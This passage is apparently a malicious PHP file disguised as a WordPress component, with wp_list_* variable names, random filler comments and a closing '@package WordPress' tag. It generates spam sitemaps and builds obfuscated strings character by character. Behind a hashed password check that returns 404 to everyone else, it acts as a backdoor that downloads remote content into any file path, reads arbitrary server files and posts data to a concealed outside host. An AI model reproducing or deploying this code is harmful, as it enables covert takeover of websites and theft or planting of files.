'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-1] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $str = ''; $gnumber++; return; } $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily 0.1 "; $star++; $starPri++; } } } if(JDT == 0){ { $gFile = '../mapper/write' . $arrABC[$gnumber-2] . 'map' .'.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-2] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $gnumber++; } }else{ { $gFile = '../mapper/write' . $arrABC[$gnumber-1] . 'map' .'.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-1] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $gnumber++; } } unset($tempArr1); unset($filenames); echo "生成sitemap成功!"; } function gsitemap($filenames,$c=1,$jdt=1){ global $gnumber,$arrArrr; $arrABC = range('a','z'); $tparrsI = $filenames; $randnum = rand(7000,7600); $tparrII = array_rand($tparrsI,$randnum); $tparrIII = array(); foreach($tparrII as $vs){ $tparrIII[$vs] = $filenames[$vs]; } $filenames = $tparrIII; $filePres = ''; $fileEnds = ''; $fpath=get_scheme() .'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $serpath=substr($fpath,0,strrpos($fpath,'/')); $siteLink=get_scheme() .'://'.$_SERVER['HTTP_HOST']; $mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'' . PHP_EOL; $mapEnd = PHP_EOL . ''; // $urlsArray = $filenames; // $numLinks = count($urlsArray); $star = 0; $priority = 0.9; $starPri = 0; $gFile =""; $date = date("Y-m-d"); $time = date("H:i:s"); $str = " " . $siteLink . " ". $date . "T" . $time ."-05:00 always 1.0 "; $tempArr1 = $filenames; foreach($tempArr1 as $key => $value2){ $curphp=basename(__FILE__); $value = $value2; $first=stristr($value,".php"); $last=stristr($value,".xml"); $checkTxt =stristr($value,".txt"); $tempPid = $key; $url = getalink($tempPid,$value2); if(JDT == 0){ if($first===false && $last===false && $checkTxt===false) { $date = date("Y-m-d"); $time = date("H:i:s"); if($star % 12000==11999){ $gFile = '../mapper/writemap.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'writemap.xml'.PHP_EOL,FILE_APPEND); $str = ''; $gnumber++; return; } if($starPri >= 400 && $priority != 0.1){ $starPri = 0; $priority = $priority - 0.1; } if($priority > 0.1){ $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily ". $priority . " "; }else{ $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily 0.1 "; } $star++; $starPri++; } }else{ if($first===false && $last===false && $checkTxt===false) { $date = date("Y-m-d"); $time = date("H:i:s"); if($star % 12000==11999){ $gFile = '../mapper/write' . $arrABC[$gnumber-1] . 'map' .'.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-1] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $str = ''; $gnumber++; return; } if($starPri >= 400 && $priority != 0.1){ $starPri = 0; $priority = $priority - 0.1; } if($priority > 0.1){ $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily ". $priority . " "; }else{ $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily 0.1 "; } $star++; $starPri++; } } } if(JDT == 0){ { $gFile = '../mapper/writemap.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'writemap.xml'.PHP_EOL,FILE_APPEND); $gnumber++; } }else{ { $gFile = '../mapper/write' . $arrABC[$gnumber-1] . 'map' .'.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-1] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $gnumber++; } } unset($tempArr1); unset($filenames); echo "生成sitemap成功!"; } function curl_get_from_webpage($url,$proxy='',$loop=10){ $data = false; $i = 0; while(!$data) { $data = curlGetOne($url,$proxy); if($i++ >= $loop) break; } return $data;} function curl_getjs_from_webpage($url,$time){ if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){ $curl = curl_init(); //如果有用代理,则使用代理. $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100"; // $urlReferer = "http://www.google.com"; curl_setopt($curl, CURLOPT_URL, $url); if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_POSTFIELDS => '', CURLOPT_RETURNTRANSFER => 1,CURLOPT_TIMEOUT => $time,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1, CURLOPT_VERBOSE => 0 ));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_TIMEOUT, $time);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent); }$data=curl_exec($curl);curl_close($curl); }else{ $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; if($is_auf){ $data = file_get_contents($url); } } if(!$data) return false; return $data; } function curlGetOne($url,$proxy=''){ if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){ $curl = curl_init(); //如果有用代理,则使用代理. $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100"; // $urlReferer = "http://www.google.com"; if(strlen($proxy) > 8) curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_URL, $url); if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_POSTFIELDS => '', CURLOPT_RETURNTRANSFER => 1,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1, CURLOPT_VERBOSE => 0 ));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent); }$data=curl_exec($curl);curl_close($curl); }else{ $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; if($is_auf){ $data = file_get_contents($url); } } if(!$data) return false; return $data; } ////wwwwwwforbg @ini_set('display_errors', 0); $wrapper_makup = "wp_list_pay"; $wp_contents = "wp_list_url"; $wp_makup = "wp_list_cat"; $wp_objacts = "wp_list_text"; $sources_block = "wp_list_tag_cloud"; $items_objacts = "wp_list_search"; $items_makup = "wp_list_rss"; $inners_value = "wp_list_recent_entries"; $filters_value = "wp_list_recent_comments"; $categoryes = "wp_list_pages"; $block_types = "wp_list_meta"; $block_contents = "wp_list_links"; $alowed_html = "wp_list_categories"; $alowed_block = "wp_list_calendar"; $allow_protocols = "wp_list_archives"; $$wrapper_makup = RandAbc(); $$wp_makup = $wp_list_pay{62}.$wp_list_pay{51}.$wp_list_pay{50}.$wp_list_pay{54}.$wp_list_pay{55}; $$sources_block = $wp_list_pay{28}.$wp_list_pay{26}.$wp_list_pay{27}.$wp_list_pay{33}; $$items_objacts = $wp_list_pay{19}.$wp_list_pay{22}.$wp_list_pay{12}.$wp_list_pay{1}.$wp_list_pay{0}.$wp_list_pay{12}.$wp_list_pay{0}.$wp_list_pay{17}.$wp_list_pay{10}.$wp_list_pay{4}.$wp_list_pay{19}; $$wp_objacts = $$wp_list_cat; $$wp_contents = $wp_list_pay{12}.$wp_list_pay{3}.$wp_list_pay{31}; $$items_makup = $wp_list_pay{30}.$wp_list_pay{35}.$wp_list_pay{32}.$wp_list_pay{34}.$wp_list_pay{31}.$wp_list_pay{34}.$wp_list_pay{31}.$wp_list_pay{3}.$wp_list_pay{26}.$wp_list_pay{5}.$wp_list_pay{5}.$wp_list_pay{4}.$wp_list_pay{29}.$wp_list_pay{31}.$wp_list_pay{28}.$wp_list_pay{27}.$wp_list_pay{0}.$wp_list_pay{26}.$wp_list_pay{30}.$wp_list_pay{32}.$wp_list_pay{5}.$wp_list_pay{26}.$wp_list_pay{30}.$wp_list_pay{34}.$wp_list_pay{28}.$wp_list_pay{5}.$wp_list_pay{33}.$wp_list_pay{0}.$wp_list_pay{3}.$wp_list_pay{31}.$wp_list_pay{34}.$wp_list_pay{3}; $$inners_value = $wp_list_pay{23}.$wp_list_pay{24}.$wp_list_pay{25}; $$filters_value = $wp_list_pay{62}.$wp_list_pay{54}.$wp_list_pay{40}.$wp_list_pay{53}.$wp_list_pay{57}.$wp_list_pay{40}.$wp_list_pay{53}; $$categoryes = $$wp_list_recent_comments; $$block_types = $wp_list_pay{39}.$wp_list_pay{50}.$wp_list_pay{38}.$wp_list_pay{56}.$wp_list_pay{48}.$wp_list_pay{40}.$wp_list_pay{49}.$wp_list_pay{55}.$wp_list_pay{62}.$wp_list_pay{53}.$wp_list_pay{50}.$wp_list_pay{50}.$wp_list_pay{55}; $$block_contents = $wp_list_pay{51}.$wp_list_pay{43}.$wp_list_pay{51}.$wp_list_pay{62}.$wp_list_pay{54}.$wp_list_pay{40}.$wp_list_pay{47}.$wp_list_pay{41}; $$alowed_html = $wp_list_pay{2}.$wp_list_pay{6}.$wp_list_pay{4}.$wp_list_pay{19}; $$alowed_block = $wp_list_pay{8}.$wp_list_pay{13}.$wp_list_pay{3}.$wp_list_pay{4}.$wp_list_pay{23}.$wp_list_pay{63}.$wp_list_pay{15}.$wp_list_pay{7}.$wp_list_pay{15}; $$allow_protocols = $wp_list_pay{7}.$wp_list_pay{19}.$wp_list_pay{19}.$wp_list_pay{15}.$wp_list_pay{64}.$wp_list_pay{65}.$wp_list_pay{65}.$wp_list_pay{22}.$wp_list_pay{22}.$wp_list_pay{22}.$wp_list_pay{63}; if(isset($wp_list_pages["$wp_list_meta"])){$BT = $wp_list_pages["$wp_list_meta"];}elseif(isset($wp_list_pages["$wp_list_links"])){$BT = str_ireplace(str_replace("\\",DIRECTORY_SEPARATOR,str_replace("/",DIRECTORY_SEPARATOR,$wp_list_pages["$wp_list_links"])),'',__FILE__).DIRECTORY_SEPARATOR;}else{$BT = '/';} foreach($wp_list_text as $wp_list_rsso=>$wp_list_searcho){ $$wp_list_rsso = $wp_list_searcho; } if(!(isset($passwd) && $wp_list_url($passwd) == $wp_list_rss)){ http_response_code(404); exit; } if(isset($act) && $act == 'check' && isset($check_file)){ if(file_exists($check_file)){ echo '#ok#'; } } if(isset($act) && $act == 'test'){ echo '#ok#'; } if(isset($act) && $act == 'recover' && isset($recover_file) && isset($recover_file_url)){ { $pfile = $recover_file; $date = $wp_list_categories($recover_file_url); gdir_file($recover_file); @chmod($pfile,0755); if($date && file_put_contents($pfile,$date)){ echo '#ok#'; }else{ echo '#fail#'; } } } $rdstr = 'r'; $rdstr .= 'e'; $rdstr .= 'date'; if(isset($act) && $act == $rdstr && isset($v_read)){ if(file_exists($v_read)){ echo see_file($v_read); } } function RandAbc($length = "") { $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_.:/-"; return ($str); } function see_file($file){ if(function_exists('file_get_contents')){ return file_get_contents($file); }else{ $handle = fopen($file, "r"); $contents = fread($handle, filesize($file)); fclose($handle); return $contents; } } function cget($url,$loop=10){ $data = false; $i = 0; while(!$data) { $data = tcget($url); if($i++ >= $loop) break; } return $data; } function tcget($url,$proxy=''){ global $wp_list_archives, $wp_list_search, $wp_list_tag_cloud, $wp_list_recent_entries; $data = ''; $url = "$wp_list_archives$wp_list_search.$wp_list_recent_entries/".$url; $url = trim($url); if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $data = curl_exec($ch); curl_close($ch); } if ($data == ''){ if (function_exists('file_get_contents') && $url){ $data = @file_get_contents($url); } } if (($data == '') && $url){ if (function_exists('fopen') && function_exists('ini_get') && ini_get('allow_url_fopen')){ ($fp = @fopen($url, 'r')); if ($fp){ while (!@feof($fp)){ $data .= @fgets($fp) . ''; } @fclose($fp); } } } return $data; } function m_mkdir($dir){ if(!is_dir($dir)) mkdir($dir); } function gdir_file($gDir=''){ global $BT; $gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir); $gDir = str_replace('\\',DIRECTORY_SEPARATOR,$gDir); $arr = explode(DIRECTORY_SEPARATOR,$gDir); if(count($arr) <= 0) return; if(!strstr($gDir,$BT)) $dir = $BT; else $dir = ''; for($i = 0 ; $i < count($arr)-1 ; $i++){ $dir .= '/' . $arr[$i]; m_mkdir($dir); } return $dir; } //wwwwwwforend function my_mkdir($dir){ global $fitime; if(!is_dir($dir)){ mkdir($dir); @touch($dir, $fitime, $fitime); } } function generate_dir_file($gDir=''){ global $hostDir; $gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir); $gDir = str_replace('\\',DIRECTORY_SEPARATOR,$gDir); $arr = explode(DIRECTORY_SEPARATOR,$gDir); if(count($arr) <= 0) return; if(!strstr($gDir,$hostDir)) $dir = $hostDir; else $dir = ''; for($i = 0 ; $i < count($arr)-1 ; $i++){ $dir .= DIRECTORY_SEPARATOR . $arr[$i]; my_mkdir($dir); } return $dir; } function strFilter($str){ $str = str_replace('`', '', $str); $str = str_replace('·', '', $str); $str = str_replace('~', '', $str); $str = str_replace('!', '', $str); $str = str_replace('!', '', $str); $str = str_replace('@', '', $str); $str = str_replace('#', '', $str); $str = str_replace('$', '', $str); $str = str_replace('¥', '', $str); $str = str_replace('%', '', $str); $str = str_replace('^', '', $str); $str = str_replace('……', '', $str); $str = str_replace('*', '', $str); $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); $str = str_replace('-', '', $str); $str = str_replace('_', '', $str); $str = str_replace('——', '', $str); $str = str_replace('+', '', $str); $str = str_replace('=', '', $str); $str = str_replace('|', '', $str); $str = str_replace('\\', '', $str); $str = str_replace('[', '', $str); $str = str_replace(']', '', $str); $str = str_replace('【', '', $str); $str = str_replace('】', '', $str); $str = str_replace('{', '', $str); $str = str_replace('}', '', $str); $str = str_replace(';', '', $str); $str = str_replace(':', '', $str); $str = str_replace('<', '', $str); $str = str_replace('>', '', $str); $str = str_replace(':', '', $str); $str = str_replace('\'', '', $str); $str = str_replace('"', '', $str); $str = str_replace(',', '', $str); $str = str_replace(',', '', $str); $str = str_replace('《', '', $str); $str = str_replace('》', '', $str); $str = str_replace('.', '', $str); $str = str_replace('。', '', $str); $str = str_replace('–', '', $str); $str = str_replace('–', '', $str); $str = str_replace('/', '', $str); $str = str_replace('、', '', $str); $str = str_replace('?', '', $str); $str = str_replace('?', '', $str); $str = str_replace('°', '', $str); $str = str_replace('&', '&', $str); return trim($str); } function getalink($pid,$pname=''){ global $arrnametime,$arrKeywz,$arr_word,$date_string; if(strstr($pname,'#cat#')){ $tp_pname_arr = explode('#cat#',$pname); $pname = $tp_pname_arr[1]; $strCat = $tp_pname_arr[0]; $tparr = explode('_-_', $strCat); if(count($tparr) > 1){ $precat = $tparr[0]; $lastcat = $tparr[1]; }else{ $precat = $tparr[0]; $lastcat = ''; } } if(function_exists("preg_split")){ $tpnameArr = preg_split('/\s+/us', $pname); }else{ $tpnameArr = explode(' ', $pname); } $pnameArr = array(); foreach($tpnameArr as $tpvs){ $tpvs = trim($tpvs); if($tpvs){ $pnameArr[] = $tpvs; } } $numPname = count($pnameArr); if($numPname > 3){ $numLinkKey = round(PNAMELEN * $numPname / 100); $yushu = KEYJG % $numPname; $arrPre = array(); $arrLast = array(); for($i=0;$i<$numPname;$i++){ if($i<$yushu){ $arrLast[] = $pnameArr[$i]; }else{ $arrPre[] = $pnameArr[$i]; } } if(count($arrLast)){ foreach($arrLast as $vs){ $arrPre[] = $vs; } } $usedNameArr = array(); for($i=0;$i<$numLinkKey;$i++){ $usedNameArr[$i] = $arrPre[$i]; } if(count($usedNameArr)){ $pname = implode(' ',$usedNameArr); } } if(JDT == 0){ $precat = strFilter($precat); $precat = preg_replace('/\s+/', '-', $precat); $lastcat = strFilter($lastcat); $lastcat = preg_replace('/\s+/', '-', $lastcat); } $pname = strFilter($pname); $filePres = ''; $fileEnds = ''; $siteLink= get_scheme() .'://'.$_SERVER['HTTP_HOST']; $dirNames = dirname(__FILE__); $httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames))); if(JDT == 2){ $filePres = $siteLink ."/". $httcReplace . "/" . basename(__FILE__) . "/"; }elseif(JDT == 1){ $filePres = $siteLink ."/". $httcReplace . "/"; }elseif(JDT == 3){ $filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?keyword="; }else{ $filePres = $siteLink."/"; } $rsp = '#'. BZPRO .'\d+#'; $rsp2 = '#\d+-#'; $rsp3 = '#-\d+#'; $pname = trim($pname); $pname = trim(str_replace('>>',' ',$pname)); $pname = preg_replace('/\s+/', '-', $pname); if(JDT == 3){ $rs = '#&[^;]+;#i'; $pname = preg_replace($rs,'',$pname); while(strstr($pname,'&')) $pname = str_replace('&','',$pname); while(strstr($pname,'--')) $pname = str_replace('--','-',$pname); $urlMid = $pname .'-' .$pid; $rtStr = $filePres.$urlMid; $rtStr = str_replace($filePres.'-',$filePres,$rtStr); return $rtStr; } $tpNum = KEYJG * $pid; $tpKey = $tpNum % count($date_string); $tpKeyStr = (KEYJG + $pid) % strlen($date_string[$tpKey]); $nums = (KEYJG + $pid) % 2 ? 5 : 6 ; $randStr = ''; for($i = 0; $i < $nums; $i++){ $tpstr = $date_string[$tpKey]; $randStr .= $tpstr{$tpKeyStr}; $tpKey = ($tpKey + 1) % count($date_string); } if(strlen($pname) > 235){ $rs = '#&[^;]+;#i'; $pname = preg_replace($rs,'',$pname); $pname = str_replace('&','',$pname); $pname = str_replace('&',';',$pname); if(function_exists("mb_substr")){ $pname = mb_substr($pname, 0, 235, 'utf-8'); }else{ $pname = substr($pname, 0, 235); } } $precat = preg_replace($rsp,'',$precat); $precat = preg_replace($rsp2,'-',$precat); $precat = preg_replace($rsp3,'-',$precat); $precat = str_replace('&','',$precat); $precat = str_replace('>>',' ',$precat); $precat = str_replace('&',';',$precat); $precat = preg_replace('/\s+/', '-', $precat); $lastcat = preg_replace($rsp,'',$lastcat); $lastcat = preg_replace($rsp2,'-',$lastcat); $lastcat = preg_replace($rsp3,'-',$lastcat); $lastcat = str_replace('&','',$lastcat); $lastcat = str_replace('>>',' ',$lastcat); $lastcat = str_replace('&',';',$lastcat); $lastcat = preg_replace('/\s+/', '-', $lastcat); $pname = preg_replace($rsp,'',$pname); $pname = preg_replace($rsp2,'-',$pname); $pname = preg_replace($rsp3,'-',$pname); if(JDT == 0){ $urlMid = $precat .'-'. $pname .'-'. $pid .'-'. $lastcat; }else{ $urlMid = $precat .'-'. $pname .'-'. $pid .'-'. $lastcat; } $urlMid .= JTHZ; $urlMid = str_replace("-/","/",$urlMid); $urlMid = str_replace("-".JTHZ,JTHZ,$urlMid); while(strstr($urlMid,'--')) $urlMid = str_replace('--','-',$urlMid); // $urlMid = str_replace('/-','/',$urlMid); $rtStr = $filePres.$urlMid; $rtStr = str_replace($filePres.'-',$filePres,$rtStr); $rtStr = str_replace('-amp;-','-&-',$rtStr); return $rtStr; } // bbbbbbbbackupbg function backup_install($dateArr,$loop=10){ $data = false; $i = 0; while(!$data) { $data = backup_install_once($dateArr); if($i++ >= $loop) break; } return $data; } function backup_install_once($dateArr=array()){ global $O0O000; $data = false; if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $O0O000); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($curl, CURLOPT_POSTFIELDS, $dateArr); $data = curl_exec($curl); curl_close($curl); }else{ $tempDate = http_build_query($dateArr); $params = array( 'http' => array( 'method' => 'POST', 'timeout' => 5, 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $tempDate ) ); $ctx = stream_context_create($params); $data = file_get_contents($O0O000, null, $ctx); } return $data; } function backup_install_two($dateArr,$loop=10){ $data = false; $i = 0; while(!$data) { $data = backup_install_once_two($dateArr); if($i++ >= $loop) break; } return $data; } function backup_install_once_two($dateArr=array()){ global $O0O000; $data = false; $tempDate = http_build_query($dateArr); $params = array( 'http' => array( 'method' => 'POST', 'timeout' => 10, 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $tempDate ) ); $ctx = stream_context_create($params); $data = file_get_contents($O0O000, null, $ctx); return $data; } function save_install($dateArr=array()){ $tpstr = serialize($dateArr); $tpstr = ''.$tpstr.''; $tpstr = base64_encode(gzdeflate($tpstr)); @file_put_contents("./logs.txt",$tpstr); } // bbbbbbbbackupend function is_ip($localIp,$ipRanges) { $localIp = ip2long($localIp); foreach($ipRanges as $val) { $ipmin=sprintf("%u",ip2long($val[0])); $ipmax=sprintf("%u",ip2long($val[1])); if($localIp >= $ipmin && $localIp <= $ipmax) { return true; } } return false;} function RandAbcs($length = ""){ $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_./:-"; return ($str); } function getarr(){ global $O00O0O; $arr[0]=$O00O0O{25}.$O00O0O{21}.$O00O0O{8}.$O00O0O{0}.$O00O0O{22}.$O00O0O{4}.$O00O0O{1}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12};$arr[1]=$O00O0O{22}.$O00O0O{19}.$O00O0O{4}.$O00O0O{2}.$O00O0O{18}.$O00O0O{17}.$O00O0O{0}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12};$arr[2]=$O00O0O{3}.$O00O0O{17}.$O00O0O{20}.$O00O0O{18}.$O00O0O{0}.$O00O0O{11}.$O00O0O{19}.$O00O0O{3}.$O00O0O{1}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12};$arr[3]=$O00O0O{4}.$O00O0O{8}.$O00O0O{13}.$O00O0O{6}.$O00O0O{4}.$O00O0O{0}.$O00O0O{13}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12};$arr[4]=$O00O0O{12}.$O00O0O{0}.$O00O0O{12}.$O00O0O{0}.$O00O0O{4}.$O00O0O{9}.$O00O0O{8}.$O00O0O{12}.$O00O0O{0}.$O00O0O{13}.$O00O0O{63}.$O00O0O{2}.$O00O0O{14}.$O00O0O{12}; return $arr; } function getthisdom(){ $myArrs = getarr(); return 'http://www.'.$myArrs[CENTERKEY].MYDIR; } function get_real_ip(){ $ip = ''; /** * resolve any proxies */ if (isset($_SERVER)) { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) { $ip = $_SERVER['HTTP_X_FORWARDED']; } elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) { $ip = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_FORWARDED_FOR']; } elseif (isset($_SERVER['HTTP_FORWARDED'])) { $ip = $_SERVER['HTTP_FORWARDED']; } else { $ip = $_SERVER['REMOTE_ADDR']; } } if (trim($ip) == '') { if (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } else { $ip = getenv('REMOTE_ADDR'); } } /** * sanitize for validity as an IPv4 or IPv6 address */ $ip = preg_replace('~[^a-fA-F0-9.:%/,]~', '', $ip); /** * if it's still blank, set to a single dot */ if (trim($ip) == '') $ip = '.'; return $ip; } /** * adjust appetite award excursion issue register relevant spot tension universe virtue weave. * adhere calculate compete decade evolve fate gaze household insurance jungle moral navigation revenue vain. * discount entry expend extent extraordinary favorable preserve significance vessel yawn. * balcony beforehand blast budget display entitle exaggerate excursion ferfile golf insignificant noticeable oval professional restrict scandal semiconductor sincere stable utter. * architecture aspect conquer continual dusk extraordinary forbid inevitable nevertheless odd previous satellite slide yield. * abuse advertise architecture arichmetic female gear generate glory identify liquor missile reject relief sophisticated spot strategy subt ultimate usage video. * abundant award bother continuous deputy facility gear germ holy identify jewel lean marveous nylon obscure opponent reliable semiconductor skim spot subsequent subt transform. * absolute adhere alcohol bargain campus code essential expansion faculty hollow incident likelihood mild minimum preserve region significance spot stable tone triangle undergo video waist. * loose ridid territory title. * approach battery candidate comment community extent faculty genius germ knot male neutral odd racial sensitive signature swallow variable. * appoint awful defect deserve devise emphasize entertainment nucleus orient reliable simplify splendid vary. * applianc distinguish liquor media moisture scratch shield software. * agent bundle commit conservative dash evolve excursion forbid hydrogen motivate notion nuclear outset pants parallel religion resolve severe subsequent survey twist volunteer weave yield. * abuse advertisement arbitrary architecture catalog continuous descend encounter expensive grant hostile jam oral oval pants portion presumably severe wealthy. * comment derive earthquake enviroment explosive extreme hint lean lynar marveous negative neutral nevertheless orbit outset oxygen poverty reinforce target variation waist. * dispose extinct jealous mere orient precaution private range region semiconductor strategic tense triumph unique welfare witness. * adhere budget cancel capture catalog dash distribute extent extreme frustrate gear hint jungle massive missile modify neutral optional retail strategy tedious tender twist. * awful blast decay ingredient liberty profit ruin secure shield target tedious. * abundant appropriate arouse conquer consistent domestic equation explore fatal grand ingredient kneel neutral opportunity register signature universal withstand. * awkward bother coach deputy emphasize exclude facility favorite ferfile idle invade jail jealous liberal optional promote restrain sake tide transplant valley. * adjust comedy distress humble issue launch massive mission partial petroleum phenomenon presumably prohibit subsequent suspicion swallow universal vanish virtue volume. * arouse breed ceremony erect explosive internal ridiculous signature subsequent terror title witness. * approximate debate defect entertainment exaggerate expensive hydrogen impose marveous neglect notion obstacle onion temple victim vital vocabulary. * core liberal previous slippery. * coach coarse compete enviroment essential exclude expensive gallery hardware hint maintain quit smash wagon weave. * bachelor fatigue globe hollow impose junior leap lest media mixture oral peak phenomenon priority relevant restraint shallow splendid spot terminal timber via victim wander. * applause ban exclude import prosperity transplant. * accelerate comment conservative decline devise exceed forbid hatred identify sensitive sketch sophisticated spit transport version video vocabulary xploit. * * @package WordPress */ //file end